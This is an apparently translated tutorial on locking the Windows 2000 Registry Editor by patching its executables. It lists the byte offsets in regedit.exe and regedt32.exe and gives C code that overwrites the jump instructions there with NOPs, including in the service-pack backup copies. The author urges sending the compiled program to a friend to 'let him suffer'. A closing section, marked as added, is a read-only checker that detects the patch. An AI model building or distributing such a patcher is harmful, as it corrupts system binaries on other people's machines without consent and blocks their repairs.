Complete registry operation

Source: Internet
Author: User

Have you ever found the Registry Editor locked, so that you cannot open it to make manual repairs? Hoho~~ This gives a lot of people a headache. I believe that once you have been locked out, you know how the lock works:

Set DisableRegistryTools under [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] to 1.
There are also several ways to unlock it, such as writing a program that calls the registry API functions to delete the entry directly, importing a .reg file, or writing a script.

Today I will show you how to write a program that implements an alternative lock, haha~~ Are you curious? Come with me.

Lab environment: Windows 2000
Objective: lock the Registry Editor. (This method uses the cracker's approach: the program directly modifies the instructions of the registry programs so that they can no longer be called.)
Implementation method: a C program

First, following the cracker's approach, we need to change the jump instructions in regedit.exe and regedt32.exe under winnt. How to obtain this information is not our purpose today, so I will not detail it here. These are the jump addresses I found in the disassembly:

1. regedit.exe
Offset address: 0x69ca; change instruction bytes 0x74 0x1a to 0x90 0x90

2. regedt32.exe
Offset address: 0x10bf2; change instruction bytes 0x74 0x52 to 0x90 0x90

Now we use a program to change the instructions at these two offsets to 0x90 0x90 (0x90 is NOP, which makes the program do nothing and move on to the next instruction). Let's see how the program is implemented.

#include <stdio.h>
#include <string.h>
#include <stdbool.h>

bool scanreg(const char *file, long offset, int length, const unsigned char *the); /* function declaration */

int main(void)
{
    unsigned char the[] = { 0x90, 0x90 };

    scanreg("C:\\winnt\\regedit.exe", 0x69ca, 0x02, the); /* modify regedit.exe under winnt */

    scanreg("C:\\winnt\\servicepackfiles\\i386\\regedit.exe", 0x69ca, 0x02, the); /* modify the service pack copy of regedit.exe */

    scanreg("C:\\winnt\\system32\\regedt32.exe", 0x10bf2, 0x02, the); /* modify regedt32.exe under system32 */

    scanreg("C:\\winnt\\servicepackfiles\\i386\\regedt32.exe", 0x10bf2, 0x02, the); /* modify the service pack copy of regedt32.exe */

    return 0;
}

bool scanreg(const char *file, long offset, int length, const unsigned char *the)
{
    FILE *fp = NULL;
    bool result = false;

    if ((fp = fopen(file, "rb+")) != NULL) /* open the file for read/write operations */
    {
        fseek(fp, offset, SEEK_SET); /* move the file pointer to the given offset */
        fwrite(the, length, 1, fp);  /* replace the instruction bytes with 0x90 */
        fclose(fp);                  /* close the file */
        result = true;
    }
    return result;
}

Well, compile the program and send it to a friend. Let him suffer. This is only a demonstration, and it applies only to Windows 2000. We could analyze the registry programs of each Windows version, then use the API function GetVersionEx(LPOSVERSIONINFO lpVersionInfo) in the program to determine the system and call the corresponding modification function based on the result. Hoho~~ Isn't that a killer of Windows?
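A read-only check for the patch sites listed above, added here as an example (it is not code from the original article): it reports whether each file still holds the original bytes at the given offset or has had them overwritten with 0x90 0x90. The names check_site and write_sample are assumptions, and write_sample only builds a constructed sample file for testing.

```c
#include <stdio.h>
#include <string.h>

/* State of the two bytes at a known patch site. */
enum site_state { SITE_ORIGINAL, SITE_NOPPED, SITE_UNKNOWN, SITE_ERROR };

/* Read-only: compare the 2 bytes at `offset` with `orig` and with 0x90 0x90. */
enum site_state check_site(const char *path, long offset, const unsigned char orig[2])
{
    static const unsigned char nops[2] = { 0x90, 0x90 };
    unsigned char got[2];
    enum site_state state = SITE_UNKNOWN;   /* neither pattern: other build or other change */
    FILE *fp = fopen(path, "rb");
    if (fp == NULL)
        return SITE_ERROR;
    if (fseek(fp, offset, SEEK_SET) != 0 || fread(got, 1, 2, fp) != 2)
        state = SITE_ERROR;                 /* file too short for this offset */
    else if (memcmp(got, orig, 2) == 0)
        state = SITE_ORIGINAL;
    else if (memcmp(got, nops, 2) == 0)
        state = SITE_NOPPED;
    fclose(fp);
    return state;
}

/* Helper (assumption, testing only): constructed file holding `b` at `offset`. */
int write_sample(const char *path, long offset, const unsigned char b[2])
{
    FILE *fp = fopen(path, "wb");
    if (fp == NULL)
        return -1;
    int ok = fseek(fp, offset, SEEK_SET) == 0 && fwrite(b, 1, 2, fp) == 2;
    return (fclose(fp) == 0 && ok) ? 0 : -1;
}

int main(void)
{
    /* Paths, offsets and original bytes as listed in the article (Windows 2000). */
    static const struct { const char *path; long off; unsigned char orig[2]; } sites[] = {
        { "C:\\winnt\\regedit.exe", 0x69ca, { 0x74, 0x1a } },
        { "C:\\winnt\\servicepackfiles\\i386\\regedit.exe", 0x69ca, { 0x74, 0x1a } },
        { "C:\\winnt\\system32\\regedt32.exe", 0x10bf2, { 0x74, 0x52 } },
        { "C:\\winnt\\servicepackfiles\\i386\\regedt32.exe", 0x10bf2, { 0x74, 0x52 } },
    };
    static const char *names[] = { "original", "NOPped", "unknown", "unreadable" };
    for (size_t i = 0; i < sizeof sites / sizeof sites[0]; i++)
        printf("%-50s %s\n", sites[i].path, names[check_site(sites[i].path, sites[i].off, sites[i].orig)]);
    return 0;
}
```

A result of "unknown" means the file is not the build the article disassembled, so those offsets say nothing about it; compare a full file hash against known-good installation media instead.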
